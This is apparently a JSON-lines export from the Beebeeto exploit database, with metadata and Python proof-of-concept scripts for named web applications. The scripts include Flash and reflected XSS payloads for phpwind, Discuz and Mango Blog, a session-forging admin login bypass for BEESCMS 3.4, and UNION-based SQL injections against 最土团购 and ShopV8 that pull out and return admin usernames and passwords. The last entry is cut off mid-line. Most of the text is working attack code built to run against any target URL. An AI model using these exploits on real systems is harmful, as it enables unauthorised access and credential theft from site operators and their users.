{"create_date": "2014-10-10 11:32:36", "name": "phpwind 9.0 /res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind,xss,FlashXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0061', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'phpwind 9.0 /res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-10', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['9.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['phpwind', 'xss', 'FlashXSS'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'phpwind9.0 res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-038433', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"e971c772b2df839298a8f8f9451f1eda\"\r\n verify_url = args['options']['target'] + \"/res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url + '?highlighterId=bb2\\\"))}catch(e){alert(1)}//'\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpwind9.0 res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2014-0061", "layer4_protocol": null}
{"create_date": "2014-10-09 14:21:51", "name": "phpwind 9.0 /res/images/uploader.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind,xss,flashxss", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0059', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'phpwind 9.0 /res/images/uploader.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-08', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['9.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['phpwind', 'xss', 'flashxss'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'phpwind 9.0 /res/images/uploader.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-017728', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"d85c815bc39c91725f264f291db70432\"\r\n verify_url = args['options']['target'] + \"/res/images/uploader.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url + '?jsobject=alert(1))}catch(e){}//'\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpwind 9.0 /res/images/uploader.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2014-0059", "layer4_protocol": null}
{"create_date": "2014-10-09 10:41:55", "name": "Discuz! x3.0 /static/image/common/flvplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,Flash XSS\u6f0f\u6d1e,flvplayer.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0057',\r\n 'name': 'Discuz! x3.0 /static/image/common/flvplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['3.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz\u6f0f\u6d1e', 'Flash XSS\u6f0f\u6d1e', 'flvplayer.swf'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.ipuman.com/pm6/138/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"7d675405ff7c94fa899784b7ccae68d3\"\r\n file_path = \"/static/image/common/flvplayer.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url + '?file=1.flv&linkfromdisplay=true&link=javascript:alert(1024);'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0057", "layer4_protocol": null}
{"create_date": "2014-10-08 16:54:37", "name": "Mango Blog 1.4.1 /archives.cfm/search XSS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Mango Blog\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/archives.cfm/search", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0056',\r\n 'name': 'Mango Blog 1.4.1 /archives.cfm/search XSS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'MangoBlog',\r\n 'vul_version': ['1.4.1'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Mango Blog\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/archives.cfm/search'],\r\n 'desc': '''\r\n Mango Blog\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9archives.cfm/search\u9875\u9762\u7684term\u53c2\u6570\u4fbf\u8fd4\u56de\u7ed9\u4e86\u7528\u6237\uff0c\r\n \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u53c2\u6570\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff0c\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4f1a\u8bdd\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-87080',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/archives.cfm/search/?term=%3Csvg%20onload=alert(100)%3E'\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if '<svg onload=alert(100)>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Mango Blog\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9archives.cfm/search\u9875\u9762\u7684term\u53c2\u6570\u4fbf\u8fd4\u56de\u7ed9\u4e86\u7528\u6237\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u53c2\u6570\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff0c\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4f1a\u8bdd\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002", "app_name": "Mango Blog", "id": "poc-2014-0056", "layer4_protocol": null}
{"create_date": "2014-10-05 12:37:26", "name": "BEESCMS 3.4 /admin/admin.php \u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u767b\u5f55\u7ed5\u8fc7", "tag": "Login Bypass,\u767b\u5f55\u7ed5\u8fc7,BEESCMS\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\nimport cookielib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0052',\r\n 'name': 'BEESCMS 3.4 /admin/admin.php \u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-05',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'BEESCMS',\r\n 'vul_version': ['3.4'],\r\n 'type': 'Login Bypass',\r\n 'tag': ['Login Bypass', '\u767b\u5f55\u7ed5\u8fc7', 'BEESCMS\u6f0f\u6d1e'],\r\n 'desc': 'BEESCMS v3.4 /includes/fun.php \u5f31\u9a8c\u8bc1\u5bfc\u81f4\u540e\u53f0\u9a8c\u8bc1\u7ed5\u8fc7',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-059180',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n cookie = cookielib.CookieJar()\r\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\r\n urllib2.install_opener(opener)\r\n postdata = \"_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\\r\\n\"\r\n # get session\r\n request = urllib2.Request(args['options']['target'] + \"/index.php\", data=postdata)\r\n r = urllib2.urlopen(request)\r\n # login test\r\n request2 = urllib2.Request(args['options']['target'] + \"/admin/admin.php\", data=postdata)\r\n r = urllib2.urlopen(request2)\r\n content = r.read()\r\n if \"admin_form.php?action=form_list&nav=list_order\" in content:\r\n if \"admin_main.php?nav=main\" in content:\r\n args['success'] = True\r\n args['test_method'] = 'http://www.wooyun.org/bugs/wooyun-2014-059180'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "BEESCMS v3.4 /includes/fun.php \u5f31\u9a8c\u8bc1\u5bfc\u81f4\u540e\u53f0\u9a8c\u8bc1\u7ed5\u8fc7", "app_name": "BEESCMS", "id": "poc-2014-0052", "layer4_protocol": null}
{"create_date": "2014-10-03 13:30:40", "name": "\u6700\u571f\u56e2\u8d2d /api/call.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0047',\r\n 'name': '\u6700\u571f\u56e2\u8d2d /api/call.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP',\r\n 'author': 'Bug',\r\n 'create_date': '2014-10-03',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6700\u571f\u56e2\u8d2d',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['SQL Injection', '\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.moonsec.com/post-11.html'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/api/call.php?action=query&num=11%27%29/**/union/**/select/**/1,2,3,\"\r\n \"concat%280x7e,0x27,username,0x7e,0x27,password%29,5,6,7,8,9,10,11,12,13,\"\r\n \"14,15,16/**/from/**/user/**/limit/**/0,1%23\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r\".*?<id>\\s*~'\\s*(?P<username>[^~]+)\\s*~'\\s*(?P<password>[\\w]+)\\s*</id>\",\r\n re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "N/A", "app_name": "\u6700\u571f\u56e2\u8d2d", "id": "poc-2014-0047", "layer4_protocol": null}
{"create_date": "2014-10-02 11:03:23", "name": "ShopV8 10.48 /admin/pinglun.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,shopv8,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0045',\r\n 'name': 'ShopV8 10.48 /admin/pinglun.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP',\r\n 'author': 'Bug',\r\n 'create_date': '2014-10-02',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'shopv8', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['10.48'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['SQL Injection', 'shopv8', '\u4fe1\u606f\u6cc4\u9732'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': '\u6f0f\u6d1e\u51fa\u73b0\u5728pinglun.asp\u6587\u4ef6', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.shellsec.com/tech/2143.html'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/admin/pinglun.asp?id=1%20and%201=2%20union%20select%201,2,3,4,\"\r\n \"username,password,7,8,9,10,11%20from%20admin\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r'.*?id=[\\'\"]?pingluntitle[\\'\"]?.*?value=[\\'\"]?(?P<username>\\w+)[\\'\"]?'#\u5339\u914d\u7528\u6237\u540d\r\n r'.*?id=[\\'\"]?pingluncontent[\\'\"]?.*?>(?P<password>\\w+)</textarea>',#\u5339\u914d\u5bc6\u7801\r\n re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u6f0f\u6d1e\u51fa\u73b0\u5728pinglun.asp\u6587\u4ef6", "app_name": "Other", "id": "poc-2014-0045", "layer4_protocol": null}
{"create_date": "2014-09-30 22:21:24", "name": "Discuz x3.0 /static/image/common/mp3player.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "XSS\u6f0f\u6d1e,mp3player.swf,Discuz\u6f0f\u6d1e,FlashXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0044', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Discuz x3.0 /static/image/common/mp3player.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'tmp', # \u4f5c\u8005\r\n 'create_date': '2014-09-30', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['3.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['XSS\u6f0f\u6d1e', 'mp3player.swf', 'Discuz\u6f0f\u6d1e', 'FlashXSS'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Discuz X3.0 static/image/common/mp3player.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.ipuman.com/pm6/138/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"f73b6405a9bb7a06ecca93bfc89f8d81\"\r\n file_path = \"/static/image/common/mp3player.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Discuz X3.0 static/image/common/mp3player.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Discuz", "id": "poc-2014-0044", "layer4_protocol": null}
{"create_date": "2014-09-30 22:05:44", "name": "08cms 3.1 /include/paygate/alipay/pays.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,08cms\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0043', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': '08cms 3.1 /include/paygate/alipay/pays.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-30', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '08cms', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['3.1'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection',# \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['SQL Injection', '08cms\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': '\u6f0f\u6d1e\u51fa\u73b0\u5728/include/paygate/alipay/pays.php\u6587\u4ef6', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.cnseay.com/3333/'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 